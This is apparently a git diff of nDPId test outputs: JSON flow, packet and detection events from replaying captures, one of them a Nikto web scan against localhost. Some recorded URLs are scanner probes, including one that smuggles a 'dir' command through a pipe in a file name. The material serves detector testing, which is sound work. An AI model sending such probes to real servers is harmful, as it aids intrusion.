+00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1434606464205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1434606464205,"pkt":"DE3pmjdIAAxCW5ILCABFAAAsd\/VAAG8GoM+y7Rj5Ch4dAwG7933\/L+hsvaBspmASQABaVgAAAgQFUAAA"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1434606464205,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1434606464205,"pkt":"AAxCW5ILDE3pmjdICABFAAAo27ZAAEAGAAAKHh0Dsu0Y+fd9Abu9oGym\/y\/obVAQ\/\/\/zIQAA"} +00639{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":32,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1434606464176,"flow_last_seen":1434606524600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":4185,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":1434606524600,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":71,"source":"Oscar.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1434606464176,"flow_last_seen":1434606536630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":5450,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1434606536630,"l3_proto":"ip4","src_ip":"10.30.29.3","dst_ip":"178.237.24.249","src_port":63357,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 00551{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":71,"source":"Oscar.pcap","alias":"nDPId-test","packets-captured":71,"packets-processed":71,"total-skipped-flows":0,"total-l4-data-len":5450,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":10,"global_ts_msec":1434606536630} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 71/71 diff --git a/test/results/WebattackRCE.pcap.out b/test/results/WebattackRCE.pcap.out index db53c8115..93aaec7e6 100644 --- a/test/results/WebattackRCE.pcap.out +++ b/test/results/WebattackRCE.pcap.out @@ -1,3193 +1,3193 @@ 00463{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"WebattackRCE.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00549{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1576420276577} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1576420276577,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276577,"pkt":"AAAAAAAAAAAAAAAACABFAAC5VktAAEAG5fF\/AAABfwAAAcGIH5Al+2Gy82DXQ4AYAED+rQAAAQEICp1m+omdZvqJR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpQb3J0IENoZWNrKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276577,"flow_last_seen":1576420276577,"flow_idle_time":7440000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276577,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Port Check)"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1576420276660,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276660,"pkt":"AAAAAAAAAAAAAAAACABFAAC27PBAAEAGT09\/AAABfwAAAcGKH5BK6tTkZxKX74AYAED+qgAAAQEICp1m+tydZvrcR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpnZXRpbmZvKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01043{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276660,"flow_last_seen":1576420276660,"flow_idle_time":7440000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276660,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:getinfo)"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1576420276662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420276662,"pkt":"AAAAAAAAAAAAAAAACABFAAC4K79AAEAGEH9\/AAABfwAAAcGMH5CQBxOx8tDDVoAYAED+rAAAAQEICp1m+t6dZvreR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} -01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7440000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1576420276665,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1576420276665,"pkt":"AAAAAAAAAAAAAAAACABFAADgK7lAAEAGEF1\/AAABfwAAAcGOH5AW+BO6KmQtsoAYAED+1AAAAQEICp1m+uGdZvrhR0VUIC8waFhDNlpVRS5yZGYrZGVzdHlwZT1jYWNoZStkZXNmb3JtYXQ9UERGIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7440000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1576420276666,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276666,"pkt":"AAAAAAAAAAAAAAAACABFAADBh\/hAAEAGtDx\/AAABfwAAAcGQH5AhqL\/5vbvzaYAYAED+tQAAAQEICp1m+uKdZvriR0VUIC8uMGhYQzZaVUUgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/.0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1576420276667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276667,"pkt":"AAAAAAAAAAAAAAAACABFAADA3LVAAEAGX4B\/AAABfwAAAcGSH5CmzuS+LKoqroAYAED+tAAAAQEICp1m+uOdZvrjR0VUIC8waFhDNlpVRSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1576420276668,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276668,"pkt":"AAAAAAAAAAAAAAAACABFAADHxyBAAEAGdQ5\/AAABfwAAAcGUH5ATo\/8SaEXHToAYAED+uwAAAQEICp1m+uSdZvrkR0VUIC8waFhDNlpVRS5wbHxkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1576420276669,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276669,"pkt":"AAAAAAAAAAAAAAAACABFAADE5o1AAEAGVaR\/AAABfwAAAcGWH5C1696FBSsDZ4AYAED+uAAAAQEICp1m+uWdZvrlR0VUIC8waFhDNlpVRS50eHQgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1576420276672,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276672,"pkt":"AAAAAAAAAAAAAAAACABFAADEp8RAAEAGlG1\/AAABfwAAAcGYH5CQgZ\/Tf1wQGoAYAED+uAAAAQEICp1m+uidZvroR0VUIC8waFhDNlpVRS5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 